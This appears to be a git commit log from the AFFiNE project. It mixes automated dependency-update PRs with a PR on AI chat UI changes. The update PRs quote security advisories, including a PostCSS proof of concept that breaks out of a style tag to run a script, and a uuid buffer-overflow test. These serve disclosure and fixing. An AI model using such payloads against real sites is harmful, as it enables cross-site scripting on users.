[link-preview-js](https://redirect.github.com/OP-Engineering/link-preview-js)
| [`4.0.0` →
`4.0.1`](https://renovatebot.com/diffs/npm/link-preview-js/4.0.0/4.0.1)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/link-preview-js/4.0.1?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/link-preview-js/4.0.0/4.0.1?slim=true)
|

---

### link-preview-js vulnerable to IPv6 and internal loopback attacks
[CVE-2026-43897](https://nvd.nist.gov/vuln/detail/CVE-2026-43897) /
[GHSA-4gp8-rjrq-ch6q](https://redirect.github.com/advisories/GHSA-4gp8-rjrq-ch6q)

<details>
<summary>More information</summary>

#### Details
##### Impact
The library did not check for IPv6 loopback attacks. There was also a
DNS attack, where an address could be resolved into an internal IP. This
could cause internal data leaks.

##### Patches
Problem has been patched in version 4.0.1. However, it cannot be
completely solved by the package alone. The regex used for validation
has been tightened for IPv6 addresses.

The DNS resolving, however, is more difficult. The regex has been
tightened to prohibit .internal, .local, .nip.io and .sslip.io
addresses, however there can be other services not on the list,
therefore it is imperative that users use the resolveDNSHost option to
do DNS resolution before fetching content. To that regard a (scary)
error message has been added when the option is not set.

##### Workarounds
Users can do their own validation before fetching content.

Reported by https://github.com/Andrew-most-likely

#### Severity
- CVSS Score: 8.7 / 10 (High)
- Vector String:
`CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N`

#### References
-
[https://github.com/OP-Engineering/link-preview-js/security/advisories/GHSA-4gp8-rjrq-ch6q](https://redirect.github.com/OP-Engineering/link-preview-js/security/advisories/GHSA-4gp8-rjrq-ch6q)
-
[https://github.com/OP-Engineering/link-preview-js/pull/179](https://redirect.github.com/OP-Engineering/link-preview-js/pull/179)
-
[https://github.com/OP-Engineering/link-preview-js/commit/4396d48909fab37553c0e93e26447fe218363ede](https://redirect.github.com/OP-Engineering/link-preview-js/commit/4396d48909fab37553c0e93e26447fe218363ede)
-
[https://github.com/OP-Engineering/link-preview-js/releases/tag/4.0.1](https://redirect.github.com/OP-Engineering/link-preview-js/releases/tag/4.0.1)
-
[https://github.com/advisories/GHSA-4gp8-rjrq-ch6q](https://redirect.github.com/advisories/GHSA-4gp8-rjrq-ch6q)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-4gp8-rjrq-ch6q)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### Release Notes

<details>
<summary>OP-Engineering/link-preview-js (link-preview-js)</summary>

###
[`v4.0.1`](https://redirect.github.com/OP-Engineering/link-preview-js/releases/tag/4.0.1)

[Compare
Source](https://redirect.github.com/OP-Engineering/link-preview-js/compare/4.0.0...4.0.1)

#### What's Changed

- Loopback fixes by
[@&#8203;ospfranco](https://redirect.github.com/ospfranco) in
[#&#8203;179](https://redirect.github.com/OP-Engineering/link-preview-js/pull/179)

**Full Changelog**:
<https://github.com/OP-Engineering/link-preview-js/compare/4.0.0...4.0.1>

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - ""
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xNTkuMiIsInVwZGF0ZWRJblZlciI6IjQzLjE1OS4yIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-05-07 11:29:35 +08:00
Adarsh Singh 440ff0c342 fix(editor): resolve UX inconsistencies in the AI chat interface (#14850)
# Closes #14189.

Fixes the three UX issues reported in the original bug report, plus one
small
adjacent polish on the right-sidebar toggle that was requested during
review.

Each concern in the issue is addressed end-to-end, with the same
treatment
applied to both places the AI chat panel lives: the **sidebar chat
panel**
(right panel on a doc page) and the **standalone `/chat` page**.

---

## 1. `+` button → persistent multi-session tabs (issue point 1)

**Before:** clicking `+` called `createFreshSession()` (standalone) or
`newSession()` (sidebar), both of which tore down the current chat
content
and replaced it in place. There was no way to keep two chats open at
once.

**After:** a browser/IDE-style tab strip lives above the chat content.
Each
open session gets its own tab with a close `×`; the active tab is
highlighted; `+` now adds a tab rather than replacing the chat.

### Details
- New Lit component `ai-chat-tabs`
([packages/frontend/core/src/blocksuite/ai/components/ai-chat-toolbar/ai-chat-tabs.ts](packages/frontend/core/src/blocksuite/ai/components/ai-chat-toolbar/ai-chat-tabs.ts)).
- Tab title is derived from `session.title` → first user message → `"New
chat"`.
- Horizontal scroll when tabs overflow, with a `wheel` handler that
converts
    mouse wheel / trackpad vertical swipe into horizontal scroll (native
horizontal trackpad swipes also work natively via `overflow-x: auto`).
- Auto `scrollIntoView({ inline: 'nearest' })` on active tab change, so
a
newly created or newly selected tab slides into view instead of staying
    hidden behind the toolbar.
- Close `×` removes the tab from the strip but leaves the session on the
server (matches the existing **Chat history** dropdown semantics — the
session is still reachable there). Closing the active tab switches to an
    adjacent one; closing the last tab starts a fresh session.
- Persistence: open session IDs are saved per-workspace in
`localStorage`
under `ai-chat-open-tabs:{workspaceId}`. On mount, the React pages
hydrate
  those IDs via `AIProvider.session.getSession` /
  `CopilotClient.getSession` — no new backend or schema work.
- Wiring: identical effects on both variants
([chat.tsx
(sidebar)](packages/frontend/core/src/desktop/pages/workspace/detail-page/tabs/chat.tsx)
and
[chat/index.tsx
(standalone)](packages/frontend/core/src/desktop/pages/workspace/chat/index.tsx))
  — hydrate → sync active session into tabs → persist.
- The tab strip sits on the same row as the existing toolbar icons
  (pin / history / `+`), separated by `flex: 1` + `min-width: 0` so the
  tabs scroll cleanly up to the toolbar boundary.
- The `ShadowlessElement` base class injects its static CSS globally,
and the
`:host` selector does not match in a React-rooted DOM — the component
uses
  tag-selector CSS (`ai-chat-tabs { display: flex; … }`) instead.

## 2. Drag-and-drop attachments (issue point 2)

**Before:** the chat input accepted no DnD. Attaching anything required
the
`+` → file-picker flow.

**After:** the chat input accepts OS files via native HTML5 DnD and
AFFiNE
documents via the repo's existing pragmatic-drag-and-drop
infrastructure.

### Details
- Native handlers (`dragenter/over/leave/drop`) on

[ai-chat-input.ts](packages/frontend/core/src/blocksuite/ai/components/ai-chat-input/ai-chat-input.ts)
accept OS files: images go into the image preview grid, other files
become
  attachment chips, with the same 50 MB per-file cap as the `+` picker.
- Internal AFFiNE document drags from the nav panel land as doc chips,
  handled via `dropTargetForElements` from
  `@atlaskit/pragmatic-drag-and-drop` (same library the rest of the app
  already uses for internal DnD).
- A "Drop to attach" overlay appears during drag, reusing the existing
focused-border token (`--affine-v2-layer-insideBorder-primaryBorder`)
for
  visual consistency with the focused state.
- The image/file routing logic that previously lived inline in
  `add-popover.ts` was factored into a shared helper

[attachment-utils.ts](packages/frontend/core/src/blocksuite/ai/components/ai-chat-chips/attachment-utils.ts)
  (`addFilesToChat`), so the `+` picker and the drop handler stay in
  lockstep.
- Analytics: extended the `addEmbeddingDoc.control` union in
[events.ts](packages/frontend/track/src/events.ts) with `'dragDrop'` so
  drag-originated attachments are distinguishable from button-initiated
  ones in telemetry.
- `@atlaskit/pragmatic-drag-and-drop` is promoted from a transitive
  dependency (via `@affine/component`) to a direct dependency of
  `@affine/core` and `yarn.lock` is refreshed accordingly.

## 3. Chat-history tooltip + icon (issue point 3)

**Before:** hovering the chat-history button showed a tooltip whose
background did not invert for dark theme (`--affine-tooltip` is not
theme-aware), and the icon was `ArrowDownSmallIcon` — a chevron that
does
not convey "history."

**After:** the tooltip primitive itself is theme-aware (every tooltip in
the app benefits, not just the chat one), and the icon is the
semantically-clear `HistoryIcon`.

### Details
- [tooltip.ts](blocksuite/affine/components/src/tooltip/tooltip.ts) now
uses
  `var(--affine-v2-tooltips-background, var(--affine-tooltip))` and
  `var(--affine-v2-tooltips-foreground, var(--affine-white))`. The V2
  tokens auto-invert with theme; the old vars remain as fallbacks so
  components that override via the existing `tooltipStyle` escape hatch
  continue to work.
- Triangle arrow colors updated to use the same V2 token.
-
[ai-chat-toolbar.ts](packages/frontend/core/src/blocksuite/ai/components/ai-chat-toolbar/ai-chat-toolbar.ts):
  `ArrowDownSmallIcon` → `HistoryIcon`; added
  `data-testid="ai-panel-chat-history"` for future e2e coverage.

## 4. Right-sidebar toggle: tooltips + open-state icon *(adjacent
polish)*

Not part of the original issue, but surfaced while testing the tab strip
—
neither of the two right-sidebar toggle buttons had hover affordance,
and
both used the same icon regardless of the sidebar's state.

- Added `tooltip="Open sidebar"` on the route-container button shown
when
  the sidebar is hidden.
- Added `tooltip="Close sidebar"` on the sidebar-header button shown
when
  the sidebar is expanded.
- The close button now renders a small inline `RightSidebarOpenIcon`
  variant: same outline as `RightSidebarIcon`, but with the right panel
  filled in the AFFiNE accent color to convey the open state. Icon shape
  change is self-contained — no new icon asset added to
  `@blocksuite/icons`.

---

## Commits

- `2adc0c7` — fix(ai-chat): theme-aware tooltip + semantic chat-history
icon *(2 files)*
- `bf26974` — feat(ai-chat): drag-and-drop file and doc attachments in
chat input *(7 files)*
- `fca29c8` — feat(ai-chat): persistent multi-session tab strip *(8
files)*
- `7d5dffe` — feat(workbench): tooltips and open-state icon for the
right-sidebar toggle *(2 files)*

Kept ordered smallest → largest blast radius so the history is easy to
bisect.

---

## Test plan

Verified locally against a fresh server stack (postgres / redis /
mailpit via
compose, migrations run) signed in as `dev@affine.pro`, in both `/chat`
and
the sidebar chat on a doc page, in light and dark themes:

- [x] Tooltip: hover the chat-history icon in dark mode → tooltip is
dark-on-light; toggle to light mode → tooltip is light-on-dark. Existing
tooltips on other surfaces (slash menu, edgeless, linked-doc) still
render correctly.
- [x] Icon: chat-history button renders the history glyph (clock), not a
chevron.
- [x] Drag-and-drop (OS file): drop a PDF / PNG / TXT onto the input →
overlay shows → chips/images appear; file > 50 MB → rejected silently
(same as `+` picker).
- [x] Drag-and-drop (internal doc): drag an AFFiNE doc from the nav
panel → becomes a doc chip.
- [x] Pin-picker, `+` picker, paste-image — all unchanged.
- [x] Tab strip: first chat auto-becomes a tab on first message; `+`
adds tab; click tab switches chat; `×` removes tab and switches to
adjacent; close last tab → new fresh tab spawns.
- [x] Reload browser → tab strip rehydrates from localStorage with the
same sessions.
- [x] Tab overflow: 12+ tabs → horizontal scroll via trackpad vertical
swipe, trackpad horizontal swipe, and mouse wheel; active tab
auto-scrolls into view on `+` click.
- [x] Right-sidebar: hover both toggle buttons → tooltips appear; open
the sidebar → close button shows the filled right-panel icon.
- [x] `yarn lint:ox` and lint-staged both clean on every commit.

Not verified locally (no local model key configured): the assistant
actually
streams a response. Drop/chip flow is independent of that path.

## Out of scope / follow-ups

- No new unit or Playwright tests — the fixes are visually verifiable
and
  reuse existing reducer / state paths. Happy to add tests if reviewers
  prefer.
- `@affine/native` is not required for the web dev stack; I only built
  `@affine/server-native`. Irrelevant to the PR diff.


<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Multi-tab chat UI with a tabs component, open/close/switch actions,
and per-workspace persistence/restoration.
  * Drag-and-drop attachments into chat input (files and docs).

* **UI/UX**
  * Tooltip theming moved to v2 variables (includes arrow color).
  * Sidebar toggle/close buttons now show tooltips.
  * “Drop to attach” overlay and updated history icon.

* **Behavior**
  * Unified attachment handling with 50MB validation and toast notices.

* **Analytics**
  * Attachment events record drag-and-drop as a control method.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->

---------

Co-authored-by: DarkSky <25152247+darkskygit@users.noreply.github.com>
2026-05-07 04:04:43 +08:00
DarkSky d64f368623 feat(server): refactor copilot (#14892)
#### PR Dependency Tree


* **PR #14892** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)
2026-05-04 00:36:47 +08:00
DarkSky fb6291cb15 fix: deps dedup 2026-05-03 23:35:57 +08:00
DarkSky 0ccfacbc29 feat(docs): migrate bs docs 2026-04-29 17:23:23 +08:00
renovate[bot] bf6fc66943 chore: bump up postcss version to v8.5.10 [SECURITY] (#14877)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [postcss](https://postcss.org/)
([source](https://redirect.github.com/postcss/postcss)) | [`8.5.6` →
`8.5.10`](https://renovatebot.com/diffs/npm/postcss/8.5.6/8.5.10) |
![age](https://developer.mend.io/api/mc/badges/age/npm/postcss/8.5.10?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/postcss/8.5.6/8.5.10?slim=true)
|

---

### PostCSS has XSS via Unescaped </style> in its CSS Stringify Output
[CVE-2026-41305](https://nvd.nist.gov/vuln/detail/CVE-2026-41305) /
[GHSA-qx2v-qp2m-jg93](https://redirect.github.com/advisories/GHSA-qx2v-qp2m-jg93)

<details>
<summary>More information</summary>

#### Details
##### PostCSS: XSS via Unescaped `</style>` in CSS Stringify Output

##### Summary

PostCSS v8.5.5 (latest) does not escape `</style>` sequences when
stringifying CSS ASTs. When user-submitted CSS is parsed and
re-stringified for embedding in HTML `<style>` tags, `</style>` in CSS
values breaks out of the style context, enabling XSS.

##### Proof of Concept

```javascript
const postcss = require('postcss');

// Parse user CSS and re-stringify for page embedding
const userCSS = 'body { content: "</style><script>alert(1)</script><style>"; }';
const ast = postcss.parse(userCSS);
const output = ast.toResult().css;
const html = `<style>${output}</style>`;

console.log(html);
// <style>body { content: "</style><script>alert(1)</script><style>"; }</style>
//
// Browser: </style> closes the style tag, <script> executes
```

**Tested output** (Node.js v22, postcss v8.5.5):
```
Input: body { content: "</style><script>alert(1)</script><style>"; }
Output: body { content: "</style><script>alert(1)</script><style>"; }
Contains </style>: true
```

##### Impact

Impact non-bundler use cases since bundlers for XSS on their own.
Requires some PostCSS plugin to have malware code, which can inject XSS
to website.

##### Suggested Fix

Escape `</style` in all stringified output values:
```javascript
output = output.replace(/<\/(style)/gi, '<\\/$1');
```

##### Credits
Discovered and reported by [Sunil Kumar](https://tharvid.in)
([@&#8203;TharVid](https://redirect.github.com/TharVid))

#### Severity
- CVSS Score: 6.1 / 10 (Medium)
- Vector String: `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N`

#### References
-
[https://github.com/postcss/postcss/security/advisories/GHSA-qx2v-qp2m-jg93](https://redirect.github.com/postcss/postcss/security/advisories/GHSA-qx2v-qp2m-jg93)
-
[https://nvd.nist.gov/vuln/detail/CVE-2026-41305](https://nvd.nist.gov/vuln/detail/CVE-2026-41305)
-
[https://github.com/postcss/postcss/releases/tag/8.5.10](https://redirect.github.com/postcss/postcss/releases/tag/8.5.10)
-
[https://github.com/advisories/GHSA-qx2v-qp2m-jg93](https://redirect.github.com/advisories/GHSA-qx2v-qp2m-jg93)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-qx2v-qp2m-jg93)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### Release Notes

<details>
<summary>postcss/postcss (postcss)</summary>

###
[`v8.5.10`](https://redirect.github.com/postcss/postcss/blob/HEAD/CHANGELOG.md#8510)

[Compare
Source](https://redirect.github.com/postcss/postcss/compare/8.5.9...8.5.10)

- Fixed XSS via unescaped `</style>` in non-bundler cases (by
[@&#8203;TharVid](https://redirect.github.com/TharVid)).

###
[`v8.5.9`](https://redirect.github.com/postcss/postcss/blob/HEAD/CHANGELOG.md#859)

[Compare
Source](https://redirect.github.com/postcss/postcss/compare/8.5.8...8.5.9)

- Speed up source map encoding paring in case of the error.

###
[`v8.5.8`](https://redirect.github.com/postcss/postcss/blob/HEAD/CHANGELOG.md#858)

[Compare
Source](https://redirect.github.com/postcss/postcss/compare/8.5.7...8.5.8)

- Fixed `Processor#version`.

###
[`v8.5.7`](https://redirect.github.com/postcss/postcss/blob/HEAD/CHANGELOG.md#857)

[Compare
Source](https://redirect.github.com/postcss/postcss/compare/8.5.6...8.5.7)

- Improved source map annotation cleaning performance (by CodeAnt AI).

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - ""
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xNDEuMyIsInVwZGF0ZWRJblZlciI6IjQzLjE0MS4zIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-04-27 11:32:36 +08:00
renovate[bot] df482c9cf2 chore: bump up uuid version to v14 [SECURITY] (#14870)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [uuid](https://redirect.github.com/uuidjs/uuid) | [`^13.0.0` →
`^14.0.0`](https://renovatebot.com/diffs/npm/uuid/13.0.0/14.0.0) |
![age](https://developer.mend.io/api/mc/badges/age/npm/uuid/14.0.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/uuid/13.0.0/14.0.0?slim=true)
|

---

### uuid: Missing buffer bounds check in v3/v5/v6 when buf is provided

[GHSA-w5hq-g745-h8pq](https://redirect.github.com/advisories/GHSA-w5hq-g745-h8pq)

<details>
<summary>More information</summary>

#### Details
##### Summary

`v3`, `v5`, and `v6` accept external output buffers but do not reject
out-of-range writes (small `buf` or large `offset`).
By contrast, `v4`, `v1`, and `v7` explicitly throw `RangeError` on
invalid bounds.

This inconsistency allows **silent partial writes** into caller-provided
buffers.

##### Affected code

- `src/v35.ts` (`v3`/`v5` path) writes `buf[offset + i]` without bounds
validation.
- `src/v6.ts` writes `buf[offset + i]` without bounds validation.

##### Reproducible PoC

```bash
cd /home/StrawHat/uuid
npm ci
npm run build

node --input-type=module -e "
import {v4,v5,v6} from './dist-node/index.js';
const ns='6ba7b810-9dad-11d1-80b4-00c04fd430c8';
for (const [name,fn] of [
  ['v4',()=>v4({},new Uint8Array(8),4)],
  ['v5',()=>v5('x',ns,new Uint8Array(8),4)],
  ['v6',()=>v6({},new Uint8Array(8),4)],
]) {
  try { fn(); console.log(name,'NO_THROW'); }
  catch(e){ console.log(name,'THREW',e.name); }
}"
```

Observed:

- `v4 THREW RangeError`
- `v5 NO_THROW`
- `v6 NO_THROW`

Example partial overwrite evidence captured during audit:

```text
same true buf [
  170, 170, 170, 170,
   75, 224, 100,  63
]
v6 [
  187, 187, 187, 187,
   31,  19, 185,  64
]
```

##### Security impact

- **Primary**: integrity/robustness issue (silent partial output).
- If an application assumes full UUID writes into preallocated buffers,
this can produce malformed/truncated/partially stale identifiers without
error.
- In systems where caller-controlled offsets/buffer sizes are exposed
indirectly, this may become a security-relevant logic flaw.

##### Suggested fix

Add the same guard used by `v4`/`v1`/`v7`:

```ts
if (offset < 0 || offset + 16 > buf.length) {
  throw new RangeError(`UUID byte range ${offset}:${offset + 15} is out of buffer bounds`);
}
```

Apply to:

- `src/v35.ts` (covers `v3` and `v5`)
- `src/v6.ts`

#### Severity
- CVSS Score: 6.3 / 10 (Medium)
- Vector String:
`CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N`

#### References
-
[https://github.com/uuidjs/uuid/security/advisories/GHSA-w5hq-g745-h8pq](https://redirect.github.com/uuidjs/uuid/security/advisories/GHSA-w5hq-g745-h8pq)
-
[https://github.com/uuidjs/uuid/commit/3d2c5b0342f0fcb52a5ac681c3d47c13e7444b34](https://redirect.github.com/uuidjs/uuid/commit/3d2c5b0342f0fcb52a5ac681c3d47c13e7444b34)
-
[https://github.com/uuidjs/uuid/releases/tag/v14.0.0](https://redirect.github.com/uuidjs/uuid/releases/tag/v14.0.0)
-
[https://github.com/advisories/GHSA-w5hq-g745-h8pq](https://redirect.github.com/advisories/GHSA-w5hq-g745-h8pq)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-w5hq-g745-h8pq)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### Release Notes

<details>
<summary>uuidjs/uuid (uuid)</summary>

###
[`v14.0.0`](https://redirect.github.com/uuidjs/uuid/blob/HEAD/CHANGELOG.md#1400-2026-04-19)

[Compare
Source](https://redirect.github.com/uuidjs/uuid/compare/v13.0.0...v14.0.0)

##### Security

- Fixes
[GHSA-w5hq-g745-h8pq](https://redirect.github.com/uuidjs/uuid/security/advisories/GHSA-w5hq-g745-h8pq):
`v3()`, `v5()`, and `v6()` did not validate that writes would remain
within the bounds of a caller-supplied buffer, allowing out-of-bounds
writes when an invalid `offset` was provided. A `RangeError` is now
thrown if `offset < 0` or `offset + 16 > buf.length`.

##### ⚠ BREAKING CHANGES

- `crypto` is now expected to be globally defined (requires
node\@&#8203;20+)
([#&#8203;935](https://redirect.github.com/uuidjs/uuid/issues/935))
- drop node\@&#8203;18 support
([#&#8203;934](https://redirect.github.com/uuidjs/uuid/issues/934))
- upgrade minimum supported TypeScript version to 5.4.3, in keeping with
the project's policy of supporting TypeScript versions released within
the last two years

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - ""
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about these
updates again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xMzkuNCIsInVwZGF0ZWRJblZlciI6IjQzLjEzOS40IiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-04-26 00:48:53 +08:00
renovate[bot] 557b1e4dfc chore: bump up eslint-plugin-oxlint version to v1.60.0 (#14853)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
|
[eslint-plugin-oxlint](https://redirect.github.com/oxc-project/eslint-plugin-oxlint)
| [`1.58.0` →
`1.60.0`](https://renovatebot.com/diffs/npm/eslint-plugin-oxlint/1.58.0/1.60.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/eslint-plugin-oxlint/1.60.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/eslint-plugin-oxlint/1.58.0/1.60.0?slim=true)
|

---

### Release Notes

<details>
<summary>oxc-project/eslint-plugin-oxlint
(eslint-plugin-oxlint)</summary>

###
[`v1.60.0`](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/releases/tag/v1.60.0)

[Compare
Source](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/compare/v1.59.0...v1.60.0)

*No significant changes*

#####     [View changes on
GitHub](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/compare/v1.59.0...v1.60.0)

###
[`v1.59.0`](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/releases/tag/v1.59.0)

[Compare
Source](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/compare/v1.58.0...v1.59.0)

*No significant changes*

#####     [View changes on
GitHub](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/compare/v1.58.0...v1.59.0)

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xMjMuOCIsInVwZGF0ZWRJblZlciI6IjQzLjEyMy44IiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-04-20 19:18:29 +08:00
renovate[bot] cc79fa3c6d chore: bump up opentelemetry (#14844)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
|
[@opentelemetry/api](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/api)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js))
| [`1.9.0` →
`1.9.1`](https://renovatebot.com/diffs/npm/@opentelemetry%2fapi/1.9.0/1.9.1)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2fapi/1.9.1?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2fapi/1.9.0/1.9.1?slim=true)
|
|
[@opentelemetry/core](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/packages/opentelemetry-core)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js))
| [`2.6.0` →
`2.7.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fcore/2.6.0/2.7.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2fcore/2.7.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2fcore/2.6.0/2.7.0?slim=true)
|
|
[@opentelemetry/exporter-prometheus](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-exporter-prometheus)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js))
| [`^0.213.0` →
`^0.215.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fexporter-prometheus/0.213.0/0.215.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2fexporter-prometheus/0.215.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2fexporter-prometheus/0.213.0/0.215.0?slim=true)
|
|
[@opentelemetry/exporter-zipkin](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/packages/opentelemetry-exporter-zipkin)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js))
| [`2.6.0` →
`2.7.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fexporter-zipkin/2.6.0/2.7.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2fexporter-zipkin/2.7.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2fexporter-zipkin/2.6.0/2.7.0?slim=true)
|
|
[@opentelemetry/instrumentation](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-instrumentation)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js))
| [`^0.213.0` →
`^0.215.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation/0.213.0/0.215.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2finstrumentation/0.215.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2finstrumentation/0.213.0/0.215.0?slim=true)
|
|
[@opentelemetry/instrumentation-graphql](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-graphql#readme)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-graphql))
| [`^0.61.0` →
`^0.63.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-graphql/0.61.0/0.63.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2finstrumentation-graphql/0.63.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2finstrumentation-graphql/0.61.0/0.63.0?slim=true)
|
|
[@opentelemetry/instrumentation-http](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-instrumentation-http)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js))
| [`^0.213.0` →
`^0.215.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-http/0.213.0/0.215.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2finstrumentation-http/0.215.0?slim=true)
|
